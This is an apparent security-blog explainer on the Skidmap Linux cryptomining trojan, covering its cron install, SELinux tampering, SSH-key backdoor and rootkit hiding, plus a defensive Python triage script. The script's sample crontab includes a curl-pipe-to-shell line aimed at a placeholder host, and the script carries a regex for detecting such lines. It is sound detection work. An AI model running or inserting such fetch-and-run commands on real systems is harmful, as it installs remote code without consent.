Linux users need to listen up – a malicious Trojan capable of injecting and concealing a cryptocurrency miner is off the leash. Skidmap is its name, and the actors behind this threat are unknown. It is also unknown whether they have specific targets or are going after any vulnerable system they can reach. Without a doubt, systems that have not been updated and whose security flaws have not been patched are the ones most likely to be susceptible to this malware. Unfortunately, the infection arrives silently, uses several techniques to conceal itself, and acts without alerting the user or security tools. Because of this, it might stay unnoticed for a long time. Once it is detected, removal must not be delayed. Unfortunately, deleting Skidmap is not a walk in the park.
Skidmap abuses crontab, the job scheduler present on Linux systems: although crontab is meant for scheduling jobs, the infection uses it to install itself. Once the installer runs, the Skidmap Trojan is downloaded without notice. To ensure that the threat is not detected and deleted right away, the attackers have set it up to weaken the system's security settings. This is done using two files. The /usr/sbin/setenforce file reconfigures the Security-Enhanced Linux (SELinux) module, and two entries are written to the /etc/selinux/config file, one that disables the SELinux policy and one that governs which processes run in confined domains. According to Augusto Remillano and Jakub Urbanec – the researchers who discovered the threat – the Trojan also gives the attackers access to the infected system via a backdoor. This backdoor is created by adding a public key to the authorized_keys file. With this backdoor open, the attackers can do pretty much whatever they want, and that is why the removal of this dangerous Trojan is so important.
The devious Trojan employs a variant of the XMRig miner to mine for Monero, a well-known and widely used cryptocurrency. The infection either injects the miner into /tmp/miner2 using the backdoor, or it downloads and installs the tool from the web. Although miners are usually fairly noticeable because they consume CPU resources, which can make a computer run slower or even crash, Skidmap is quite good at concealing the tool. In fact, the threat is able to hide network traffic and CPU usage to trick the victim into thinking that whatever symptoms they might be experiencing are not related to malicious activity or an all-consuming miner. The netlink component (a rootkit) that the Trojan employs is crucial for that. Other components include iproute (hides files), kaudited (downloads loadable kernel modules), and a fake “rm” binary (downloads and executes files). This fake binary is used when the miner is downloaded from the web, as opposed to being injected via the backdoor.
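The indicators described in the two paragraphs above (a cron entry that fetches and runs the installer, SELinux enforcement switched off in /etc/selinux/config, an extra public key in authorized_keys, and a miner at /tmp/miner2) can be checked with a small host-triage script. The code below is an added example written for this page, not code from Trend Micro or from the original article. It runs entirely against constructed in-memory samples (the key blobs, cron lines and the example.invalid URL are all made up); on a real host you would feed it the contents of /etc/selinux/config, each user's authorized_keys file, the output of crontab -l, and the set of paths that exist. The approved-key list is an assumption: you maintain it from your own provisioning records.

```python
import base64
import binascii
import hashlib
import re
from typing import Dict, List, Set

# Paths named in the article; the miner drop location is the one Trend Micro reported.
MINER_PATH = "/tmp/miner2"
SELINUX_CONFIG_PATH = "/etc/selinux/config"

# The text says the installer arrives through crontab. Flag any cron entry that
# pipes curl/wget output into a shell or drops a download under /tmp.
SUSPICIOUS_CRON = re.compile(r"\b(curl|wget)\b[^\n]*(\|\s*(sh|bash)\b|/tmp/)")


def key_fingerprint(blob_b64: str) -> str:
    """SHA-256 fingerprint of a base64 public-key blob, in the form
    ssh-keygen -l prints it (base64 without padding)."""
    digest = hashlib.sha256(base64.b64decode(blob_b64)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def selinux_findings(config_text: str) -> List[str]:
    """Report a config whose SELINUX= setting is anything other than enforcing."""
    findings = []
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip() == "SELINUX" and value.strip().lower() != "enforcing":
            findings.append(f"{SELINUX_CONFIG_PATH}: enforcement off ({line})")
    return findings


def authorized_keys_findings(keys_text: str, approved: Set[str]) -> List[str]:
    """Report every key whose fingerprint is not on the approved list; the
    backdoor described in the article is exactly one such added key."""
    findings = []
    for raw in keys_text.splitlines():
        parts = raw.strip().split()
        if len(parts) < 2 or parts[0].startswith("#"):
            continue
        # A leading options field (e.g. command="...") shifts the key type right.
        idx = 0 if parts[0].startswith(("ssh-", "ecdsa-", "sk-")) else 1
        if idx + 1 >= len(parts):
            continue
        try:
            fp = key_fingerprint(parts[idx + 1])
        except (binascii.Error, ValueError):
            findings.append(f"unparseable authorized_keys line: {raw.strip()}")
            continue
        if fp not in approved:
            comment = parts[idx + 2] if len(parts) > idx + 2 else "(no comment)"
            findings.append(f"unapproved key {fp} {comment}")
    return findings


def crontab_findings(crontab_text: str) -> List[str]:
    return [f"suspicious cron entry: {line.strip()}"
            for line in crontab_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#")
            and SUSPICIOUS_CRON.search(line)]


def artifact_findings(existing_paths: Set[str]) -> List[str]:
    return [f"miner artifact present: {MINER_PATH}"] if MINER_PATH in existing_paths else []


def triage(selinux_config: str, authorized_keys: str, crontab: str,
           existing_paths: Set[str], approved_keys: Set[str]) -> Dict[str, List[str]]:
    """Run every check and return only the sections that produced findings."""
    report = {
        "selinux": selinux_findings(selinux_config),
        "ssh_keys": authorized_keys_findings(authorized_keys, approved_keys),
        "cron": crontab_findings(crontab),
        "artifacts": artifact_findings(existing_paths),
    }
    return {section: hits for section, hits in report.items() if hits}


# Constructed samples standing in for real host data.
SAMPLE_ADMIN_BLOB = base64.b64encode(b"constructed admin key bytes").decode()
SAMPLE_ROGUE_BLOB = base64.b64encode(b"constructed rogue key bytes").decode()
SAMPLE_SELINUX_CONFIG = "# constructed sample\nSELINUX=disabled\nSELINUXTYPE=targeted\n"
SAMPLE_AUTHORIZED_KEYS = (f"ssh-ed25519 {SAMPLE_ADMIN_BLOB} admin@host\n"
                          f"ssh-ed25519 {SAMPLE_ROGUE_BLOB}\n")
SAMPLE_CRONTAB = ("0 3 * * * /usr/bin/logrotate /etc/logrotate.conf\n"
                  "*/1 * * * * curl -fsSL http://example.invalid/pm.sh | sh\n")
SAMPLE_PATHS = {"/usr/bin/rm", "/tmp/miner2"}

if __name__ == "__main__":
    approved = {key_fingerprint(SAMPLE_ADMIN_BLOB)}
    for section, hits in triage(SAMPLE_SELINUX_CONFIG, SAMPLE_AUTHORIZED_KEYS,
                                SAMPLE_CRONTAB, SAMPLE_PATHS, approved).items():
        for hit in hits:
            print(f"[{section}] {hit}")
```

The fingerprint comparison is deliberate: matching on the key comment or on the raw blob is easy to spoof or miss, while an allow-list of SHA-256 fingerprints from your provisioning system gives a stable answer for the authorized_keys check. Because the article notes that Skidmap's rootkit component hides files and process data from userland, a clean result from a script like this on the live host is not proof of absence; confirm from a boot of known-good media or from a disk image where the rootkit is not loaded.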
An infection that opens a backdoor, that allows remote attackers to run commands, disable security, and execute files, and that makes it easy to make money at the expense of your system’s resources cannot be ignored. Skidmap is such a threat, and its removal is crucial. Unfortunately, its rootkit components can make it difficult to eliminate completely, and manual removal is not recommended. Luckily, there are plenty of legitimate and trustworthy tools that you can use to remove Skidmap automatically. Just make sure you install legitimate tools, and not malware that is presented as genuine anti-malware software. After successful removal, it is important that you start taking your virtual security much more seriously. At the end of the day, there are plenty of cybercriminals who focus on invading Linux systems, and their job is much easier if these systems are left vulnerable and outdated.
Augusto Remillano and Jakub Urbanec. September 16, 2019. Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Trend Micro.